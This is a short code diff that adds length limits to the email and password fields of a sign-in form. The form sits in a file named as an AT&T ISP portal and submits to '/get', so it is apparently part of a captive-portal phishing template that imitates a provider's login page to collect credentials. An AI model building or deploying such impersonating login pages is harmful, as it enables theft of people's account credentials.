--- a/portals/isp/at&t.html
+++ b/portals/isp/at&t.html
@@ -80,9 +80,9 @@ button:hover {
 
 <form action="/get">
 
-  <input type="text" name="email" placeholder="Email or Phone Number" required>
+  <input type="text" name="email" placeholder="Email or Phone Number" maxlength="100" required>
   
-  <input type="password" name="password" placeholder="Password" required>
+  <input type="password" name="password" placeholder="Password" maxlength="100" required>
 
   <button type="submit">Sign In</button>
   
